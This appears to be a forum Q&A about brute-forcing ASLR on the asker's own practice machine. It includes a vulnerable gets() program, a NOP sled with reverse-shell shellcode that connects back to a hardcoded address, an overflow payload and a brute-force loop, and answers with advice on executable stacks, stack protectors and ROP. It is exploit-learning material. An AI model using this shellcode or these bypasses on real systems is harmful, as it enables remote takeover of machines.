Brute-forcing ASLR
I have been trying to brute-force the ASLR implementation on my machine, for practice. First, I make sure that ASLR is turned on.
cat /proc/sys/kernel/randomize_va_space
1
The machine I am using is:
bt ~ # uname -a
Linux bt 2.6.20-BT-PwnSauce-NOSMP #3 Sat Feb 24 15:52:59 GMT 2007 i686 pentium3 i386 GNU/Linux
My program is simple, as follows.
bt ~ # cat t.c
#include<stdio.h>
int main(int argc, char **argv) {
char buffer[50];
gets(buffer);
return 0;
}
In order to exploit this, I create an environment variable as follows. As you can see, it has a really huge NOP sled followed by the exploit code for a reverse shell.
export EGG=`perl -e 'print "\x90"x64000 . "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xac\x10\x00\x01\x66\x68\x11\x5c\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"'`
I find out the address of the environment variable using the following C program:
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char **argv) {
/* prints the address at which the variable named in argv[1] lives in this process */
printf("%p\n", getenv(argv[1]));
return 0;
}
I get the address as 0xbfefadfd.
I figure out that overflowing the return address takes 76 bytes of something + 4 bytes of the return address. So, in order to brute-force, I do:
$ echo `perl -e 'print "A"x76 . "\xfd\xad\xef\xbf"'` > file
$ while true; do ./t < file; done
As expected I get a log of segmentation faults; however, I do not get a reverse shell even after running the program for about 30 minutes. Is there something I'm doing wrong here?
There are a few things you must take into consideration.
1. Your shellcode must match your architecture (this is easy to test).
2. Because you put your shellcode on the stack, you must make sure the stack is executable.
One way to achieve this is to compile with the "-z execstack" flag to gcc.
Also, there might be other approaches which might increase your chances of hitting the correct address.
It could be that the stack is non-executable. You could check with readelf. If the GNU_STACK section is not marked executable, your application has an NX stack. By the way, there is a better approach to defeat ASLR in this case.
What you could do is return to the .text section, whose address is unchanged by ASLR. pop-ret, pop-pop-ret would pop the stack until you reach some "usable" values. What is usable is highly situational. Usually, you'll look for pointers to input strings, env vars, etc.
Also, Return Oriented Programming (ROP) is a buzzword nowadays. Check it out.
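As an added example that is not part of either of the two answers above, the following C program makes the readelf check programmatic: it parses the ELF program headers itself and reports whether the PT_GNU_STACK entry requests an executable stack, which is the same fact `readelf -l ./t | grep GNU_STACK` shows (flags RW for an NX stack, RWE after gcc `-z execstack`). It assumes Linux with glibc's <elf.h>, uses /proc/self/exe as the default path, and only handles ELF files in host byte order; the result-code names and the function gnu_stack_flags are my own, not from any answer.

```c
/* gnu_stack_check.c: added example, not from the original thread.
 * Reads the PT_GNU_STACK program header of an ELF binary and reports whether
 * the binary asks the kernel for an executable stack. Assumes Linux/glibc
 * (<elf.h>, /proc/self/exe) and an ELF file in the host's byte order. */
#include <elf.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

enum {
    STACK_NX        =  0,  /* GNU_STACK present, PF_X clear: non-executable stack */
    STACK_EXEC      =  1,  /* GNU_STACK present, PF_X set: executable stack (gcc -z execstack) */
    STACK_NO_HEADER = -1,  /* no GNU_STACK header: kernel default applies (historically executable) */
    STACK_ERROR     = -2   /* unreadable, not an ELF file, or truncated */
};

/* Read exactly len bytes at file offset off; 0 on success, -1 otherwise. */
static int read_at(int fd, off_t off, void *buf, size_t len) {
    return pread(fd, buf, len, off) == (ssize_t)len ? 0 : -1;
}

/* Walk the program header table of a 32-bit ELF (the asker's i686 case). */
static int scan_elf32(int fd) {
    Elf32_Ehdr eh;
    if (read_at(fd, 0, &eh, sizeof eh) < 0) return STACK_ERROR;
    for (unsigned i = 0; i < eh.e_phnum; i++) {
        Elf32_Phdr ph;
        off_t off = (off_t)eh.e_phoff + (off_t)i * eh.e_phentsize;
        if (read_at(fd, off, &ph, sizeof ph) < 0) return STACK_ERROR;
        if (ph.p_type == PT_GNU_STACK)
            return (ph.p_flags & PF_X) ? STACK_EXEC : STACK_NX;
    }
    return STACK_NO_HEADER;
}

/* Same walk for a 64-bit ELF; only the header struct types differ. */
static int scan_elf64(int fd) {
    Elf64_Ehdr eh;
    if (read_at(fd, 0, &eh, sizeof eh) < 0) return STACK_ERROR;
    for (unsigned i = 0; i < eh.e_phnum; i++) {
        Elf64_Phdr ph;
        off_t off = (off_t)eh.e_phoff + (off_t)i * eh.e_phentsize;
        if (read_at(fd, off, &ph, sizeof ph) < 0) return STACK_ERROR;
        if (ph.p_type == PT_GNU_STACK)
            return (ph.p_flags & PF_X) ? STACK_EXEC : STACK_NX;
    }
    return STACK_NO_HEADER;
}

/* Classify the stack permissions requested by the ELF file at path. */
int gnu_stack_flags(const char *path) {
    unsigned char ident[EI_NIDENT];
    int rc = STACK_ERROR;
    int fd = open(path, O_RDONLY);
    if (fd < 0) return STACK_ERROR;
    /* Check the magic first, then dispatch on ELF class. */
    if (read_at(fd, 0, ident, sizeof ident) == 0 && memcmp(ident, ELFMAG, SELFMAG) == 0) {
        if (ident[EI_CLASS] == ELFCLASS32)      rc = scan_elf32(fd);
        else if (ident[EI_CLASS] == ELFCLASS64) rc = scan_elf64(fd);
    }
    close(fd);
    return rc;
}

static const char *describe(int rc) {
    switch (rc) {
    case STACK_NX:        return "GNU_STACK RW  -> NX stack: shellcode placed on the stack will not execute";
    case STACK_EXEC:      return "GNU_STACK RWE -> executable stack";
    case STACK_NO_HEADER: return "no GNU_STACK header -> kernel default (executable on old kernels)";
    default:              return "not a readable ELF file";
    }
}

int main(int argc, char **argv) {
    const char *path = argc > 1 ? argv[1] : "/proc/self/exe";
    int rc = gnu_stack_flags(path);
    printf("%s: %s\n", path, describe(rc));
    return rc == STACK_ERROR ? 1 : 0;
}
```

Build the asker's t.c twice, once plain and once with `gcc -z execstack -fno-stack-protector -o t t.c`, and point the checker at each binary; only the second should report RWE. The check says nothing about ASLR or stack canaries, so the -fno-stack-protector point raised separately in this thread still applies on its own.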
I don't know which platform you are trying this on, but it's very likely that, aside from ASLR, your gcc defaults to using a stack canary/protector as well. To disable this, compile with -fno-stack-protector.